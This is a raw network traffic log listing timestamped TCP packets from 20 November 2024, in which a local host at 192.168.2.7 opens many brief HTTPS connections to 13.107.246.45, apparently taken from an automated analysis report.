                                                                                                                                                                                                Nov 20, 2024 10:54:53.950025082 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.950100899 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.952296972 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.952306986 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.952316046 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.952320099 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.956176996 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.956218004 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.956379890 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.956607103 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.956623077 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.215775967 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.261739969 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.270340919 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.280416965 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.280431032 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.280915976 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.280921936 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.281636000 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.281652927 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.282473087 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.282478094 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.298691988 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.299113035 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.299896955 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.299911976 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.300391912 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.300395966 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.301632881 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.301646948 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.302146912 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.302151918 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.375935078 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.376070976 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.376157999 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.378532887 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.378973007 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.379009008 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.379066944 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.402410984 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.402991056 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.403096914 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.403273106 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.403353930 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.403419018 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.403470039 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.640880108 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.685704947 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.685734987 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686260939 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686269045 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686428070 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686449051 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686455011 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.686460972 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690823078 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690829039 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690845013 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690848112 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690968037 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.690979004 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691016912 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691021919 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691915035 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691931009 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691943884 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.691950083 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737188101 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737277031 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737412930 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737514973 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737580061 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.737824917 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738460064 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738487005 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738558054 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738820076 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738843918 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.738904953 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739123106 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739151955 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739378929 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739397049 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739542007 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739569902 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739725113 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.739741087 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.785660982 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.785948992 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.786043882 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.787045002 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.787045002 CET49994443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.787065983 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.787077904 CET4434999413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.793847084 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.793865919 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:54.794192076 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.794481993 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:54.794492960 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.376835108 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.384444952 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.388530970 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.400963068 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.436338902 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.453044891 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.468226910 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.468383074 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.476483107 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.481919050 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.481934071 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.482566118 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.482572079 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.482923985 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.482930899 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.483350992 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.483355999 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.483645916 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.483650923 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.484226942 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.484231949 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.580250025 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.580791950 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.580857038 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.580866098 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.580909967 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.581526041 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.581964970 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.582019091 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.586030960 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.586350918 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.586556911 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.866256952 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.866281033 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.867394924 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.867402077 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.868905067 CET50002443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.868918896 CET4435000213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.885742903 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.885760069 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.886466980 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.886471987 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.887258053 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.887258053 CET49998443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.887279034 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.887290001 CET4434999813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.889628887 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.889635086 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.889647007 CET49999443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.889651060 CET4434999913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.895982027 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.895993948 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.896061897 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.896291018 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.896302938 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.898222923 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.898256063 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.898355961 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.898504972 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.898523092 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.899735928 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.899756908 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.899900913 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.900187016 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.900199890 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.967562914 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.968065977 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.968162060 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.987804890 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.988323927 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.990878105 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.996588945 CET49997443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.996598959 CET4434999713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:55.998496056 CET50000443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:55.998507977 CET4435000013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.003941059 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.003968000 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.004060984 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.004873991 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.004892111 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.005920887 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.005942106 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.006089926 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.006329060 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.006344080 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.531054974 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.544852972 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.544864893 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.546080112 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.546084881 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.546331882 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.546983004 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.547015905 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.550209999 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.550223112 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.576862097 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.577418089 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.577440023 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.577868938 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.577874899 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.642693043 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.643172979 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.643232107 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.646425009 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.646615982 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.648184061 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.652899981 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.657368898 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.688325882 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.688519001 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.688571930 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.697810888 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.697822094 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698613882 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698618889 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698852062 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698852062 CET50014443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698859930 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698868990 CET4435001413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698954105 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698964119 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698976994 CET50016443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.698983908 CET4435001613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701594114 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701611996 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701622963 CET50015443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701628923 CET4435001513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701817989 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.701841116 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.702652931 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.702661037 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.713061094 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.713098049 CET4435002713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.713174105 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.716305971 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.716320038 CET4435002813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.716609001 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.716757059 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.716763020 CET4435002813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717585087 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717602015 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717713118 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717725992 CET4435002713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717750072 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717902899 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.717915058 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.795387983 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.795579910 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.795650959 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.799602985 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.799761057 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.799815893 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.804699898 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.804709911 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.804744959 CET50018443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.804752111 CET4435001813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.805159092 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.805159092 CET50017443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.805167913 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.805177927 CET4435001713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.940646887 CET50030443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.940679073 CET4435003013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.940804958 CET50030443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.944067955 CET50031443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:56.944107056 CET4435003113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:56.944262028 CET50031443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.196062088 CET50030443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.196073055 CET4435003013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.315583944 CET50031443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.315629005 CET4435003113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.353480101 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.356647015 CET4435002713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.366044044 CET4435002813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.541234970 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.541234016 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.541332006 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.548749924 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.548754930 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.549264908 CET50029443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.549268961 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.549782038 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.549791098 CET4435002713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550149918 CET50027443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550156116 CET4435002713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550640106 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550643921 CET4435002813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550957918 CET50028443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:57.550962925 CET4435002813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.644774914 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.645203114 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.645258904 CET4435002913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:57.645277023 CET50029443192.168.2.713.107.246.45
